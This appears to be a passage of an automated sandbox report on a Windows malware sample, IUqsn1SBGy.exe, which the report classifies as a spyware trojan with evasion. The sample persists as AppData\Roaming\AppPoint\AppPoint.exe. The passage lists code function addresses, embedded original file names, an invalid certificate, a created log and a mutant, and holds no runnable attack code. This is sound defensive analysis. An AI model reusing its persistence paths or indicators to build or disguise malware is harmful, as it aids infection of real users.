Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E34FD8	0_2_09E34FD8
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E39E89	0_2_09E39E89
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E30040	0_2_09E30040
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E30012	0_2_09E30012
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E333B8	0_2_09E333B8
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E35274	0_2_09E35274
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E35278	0_2_09E35278
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E38228	0_2_09E38228
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E38218	0_2_09E38218
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E38568	0_2_09E38568
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E38559	0_2_09E38559
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E33488	0_2_09E33488
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E35448	0_2_09E35448
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E35458	0_2_09E35458
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09E3A438	0_2_09E3A438
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09FC1970	0_2_09FC1970
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09FC10CB	0_2_09FC10CB
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09FC9388	0_2_09FC9388
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09FC1538	0_2_09FC1538
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09FC1528	0_2_09FC1528
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09FC34E8	0_2_09FC34E8
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_09FC2C10	0_2_09FC2C10
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_0A562106	0_2_0A562106
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_0A56ACFC	0_2_0A56ACFC
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_0A56C158	0_2_0A56C158
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_0A562C38	0_2_0A562C38
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_0A56ACD5	0_2_0A56ACD5
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_011FC02D	5_2_011FC02D
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_011F40C8	5_2_011F40C8
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_011F4410	5_2_011F4410
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_011F4CE0	5_2_011F4CE0
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_066F7EB8	5_2_066F7EB8
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_066FCC58	5_2_066FCC58
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_066F54D8	5_2_066F54D8
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_066F6580	5_2_066F6580
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_066F3200	5_2_066F3200
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_066FB858	5_2_066FB858
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_066F5C43	5_2_066F5C43
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_066FF288	5_2_066FF288
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_066F0040	5_2_066F0040
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_06FC2D68	5_2_06FC2D68
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_06FC2D58	5_2_06FC2D58
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_066F0006	5_2_066F0006
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60F68	8_2_00C60F68
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60995	8_2_00C60995
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60960	8_2_00C60960
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60927	8_2_00C60927
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60ADD	8_2_00C60ADD
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C62A88	8_2_00C62A88
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60AAA	8_2_00C60AAA
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60A31	8_2_00C60A31
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60BE1	8_2_00C60BE1
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60B9E	8_2_00C60B9E
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60B33	8_2_00C60B33
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60C95	8_2_00C60C95
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60C5D	8_2_00C60C5D
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60C15	8_2_00C60C15
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C62C10	8_2_00C62C10
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C62C20	8_2_00C62C20
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60DFC	8_2_00C60DFC
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60D97	8_2_00C60D97
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60D40	8_2_00C60D40
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60D14	8_2_00C60D14
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60E7B	8_2_00C60E7B
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C60F58	8_2_00C60F58
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C63408	8_2_00C63408
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C635F0	8_2_00C635F0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_00C636E8	8_2_00C636E8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E67DF8	8_2_04E67DF8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E65823	8_2_04E65823
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E62E40	8_2_04E62E40
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E62E33	8_2_04E62E33
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E61768	8_2_04E61768
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E61758	8_2_04E61758
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E63707	8_2_04E63707
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E63718	8_2_04E63718
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E65823	8_2_04E65823
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E61BA0	8_2_04E61BA0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E61B90	8_2_04E61B90
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_04E61330	8_2_04E61330
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_08F50040	8_2_08F50040
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_08F5ACFC	8_2_08F5ACFC
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_08F5C158	8_2_08F5C158
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09160B90	8_2_09160B90
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09162CF8	8_2_09162CF8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09161E88	8_2_09161E88
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_0916A018	8_2_0916A018
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_091680F0	8_2_091680F0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09161450	8_2_09161450
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09169718	8_2_09169718
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09161880	8_2_09161880
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_091618E6	8_2_091618E6
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_091618E8	8_2_091618E8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09163BD8	8_2_09163BD8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09163BC8	8_2_09163BC8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09162BE0	8_2_09162BE0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09168AD1	8_2_09168AD1
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09160AF2	8_2_09160AF2
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09168AE0	8_2_09168AE0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09164DD3	8_2_09164DD3
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09164DE0	8_2_09164DE0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09162C10	8_2_09162C10
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09164FD8	8_2_09164FD8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09164FE8	8_2_09164FE8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09161E78	8_2_09161E78
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09168E90	8_2_09168E90
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09168EA0	8_2_09168EA0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09160006	8_2_09160006
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_0916A00B	8_2_0916A00B
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09160040	8_2_09160040
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_091680E1	8_2_091680E1
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09168399	8_2_09168399
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_091683A8	8_2_091683A8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09165278	8_2_09165278
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_0916526B	8_2_0916526B
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_0916A5BB	8_2_0916A5BB
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_091655D8	8_2_091655D8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_091655C8	8_2_091655C8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_0916A5C8	8_2_0916A5C8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09161440	8_2_09161440
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09163483	8_2_09163483
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_09169708	8_2_09169708
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_091686D8	8_2_091686D8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_091686E8	8_2_091686E8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_00E940C8	10_2_00E940C8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_00E9B210	10_2_00E9B210
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_00E94410	10_2_00E94410
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_00E9E990	10_2_00E9E990
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_00E9BA20	10_2_00E9BA20
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_00E94CE0	10_2_00E94CE0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_06523600	10_2_06523600
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_0652CC50	10_2_0652CC50
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_065282B8	10_2_065282B8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_06526058	10_2_06526058
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_065258D8	10_2_065258D8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_06526980	10_2_06526980
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_0652F280	10_2_0652F280
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_06520040	10_2_06520040
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_06520017	10_2_06520017
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510F68	11_2_01510F68
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510960	11_2_01510960
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510927	11_2_01510927
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510995	11_2_01510995
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510B33	11_2_01510B33
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510BE1	11_2_01510BE1
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510B9E	11_2_01510B9E
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510A31	11_2_01510A31
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510ADD	11_2_01510ADD
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510AAA	11_2_01510AAA
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510D40	11_2_01510D40
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510D14	11_2_01510D14
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510DFC	11_2_01510DFC
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510D97	11_2_01510D97
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510C5D	11_2_01510C5D
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01512C10	11_2_01512C10
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510C15	11_2_01510C15
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01512C20	11_2_01512C20
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510C95	11_2_01510C95
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01510E7B	11_2_01510E7B
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_015135F0	11_2_015135F0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_01513408	11_2_01513408
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_015136E8	11_2_015136E8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_056A7D38	11_2_056A7D38
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_056A1768	11_2_056A1768
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_056A1758	11_2_056A1758
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_056A3707	11_2_056A3707
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_056A3718	11_2_056A3718
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_056A2E40	11_2_056A2E40
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_056A2E31	11_2_056A2E31
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_056A1330	11_2_056A1330
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_056A1BA0	11_2_056A1BA0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_097F2106	11_2_097F2106
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_097FACFC	11_2_097FACFC
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_097FC158	11_2_097FC158
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_097F2C38	11_2_097F2C38
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B210B90	11_2_0B210B90
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B21A018	11_2_0B21A018
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B2180F0	11_2_0B2180F0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B219718	11_2_0B219718
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B211E88	11_2_0B211E88
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B211450	11_2_0B211450
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B212CF8	11_2_0B212CF8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B210B77	11_2_0B210B77
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B2183A8	11_2_0B2183A8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B218399	11_2_0B218399
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B213BD8	11_2_0B213BD8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B215270	11_2_0B215270
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B215278	11_2_0B215278
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B218AE0	11_2_0B218AE0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B218AD1	11_2_0B218AD1
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B21A011	11_2_0B21A011
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B210040	11_2_0B210040
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B2180E1	11_2_0B2180E1
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B2118E3	11_2_0B2118E3
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B2118E8	11_2_0B2118E8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B219708	11_2_0B219708
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B214FE8	11_2_0B214FE8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B211E78	11_2_0B211E78
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B218EA0	11_2_0B218EA0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B218E90	11_2_0B218E90
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B2186E8	11_2_0B2186E8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B2186D8	11_2_0B2186D8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B214DE0	11_2_0B214DE0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B21A5C0	11_2_0B21A5C0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B21A5C8	11_2_0B21A5C8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B2155C8	11_2_0B2155C8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B2155D8	11_2_0B2155D8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B214DDD	11_2_0B214DDD
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B212CAF	11_2_0B212CAF
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_0B212C9B	11_2_0B212C9B
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_00FC40C8	12_2_00FC40C8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_00FC4410	12_2_00FC4410
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_00FCE990	12_2_00FCE990
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_00FC4CE0	12_2_00FC4CE0
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_00FCBA20	12_2_00FCBA20
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_06753600	12_2_06753600
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_0675CC50	12_2_0675CC50
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_067582B8	12_2_067582B8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_06756043	12_2_06756043
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_067558D8	12_2_067558D8
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_06756980	12_2_06756980
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_0675F280	12_2_0675F280
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_06750040	12_2_06750040
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_06750007	12_2_06750007

Source: IUqsn1SBGy.exe

Static PE information: invalid certificate

Source: IUqsn1SBGy.exe, 00000000.00000002.2128585146.0000000009AE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000000.00000002.2120673321.000000000155E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000000.00000002.2129840908.000000000F190000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000000.00000002.2121820572.0000000003341000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename568664f0-e437-4bb6-b6aa-41143e0997d7.exe4 vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000000.00000000.2067442181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHHoGh.exe4 vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000000.00000002.2123371459.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename568664f0-e437-4bb6-b6aa-41143e0997d7.exe4 vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000000.00000002.2123371459.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000000.00000002.2123371459.0000000004B95000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000000.00000002.2123371459.0000000004B95000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename568664f0-e437-4bb6-b6aa-41143e0997d7.exe4 vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000005.00000002.4516594330.00000000009E8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe, 00000005.00000002.4520429982.0000000002C70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]q,\\StringFileInfo\\080904B0\\OriginalFilename vs IUqsn1SBGy.exe
Source: IUqsn1SBGy.exe	Binary or memory string: OriginalFilenameHHoGh.exe4 vs IUqsn1SBGy.exe

Source: IUqsn1SBGy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: IUqsn1SBGy.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AppPoint.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@15/18@4/2

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IUqsn1SBGy.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Mutant created: NULL
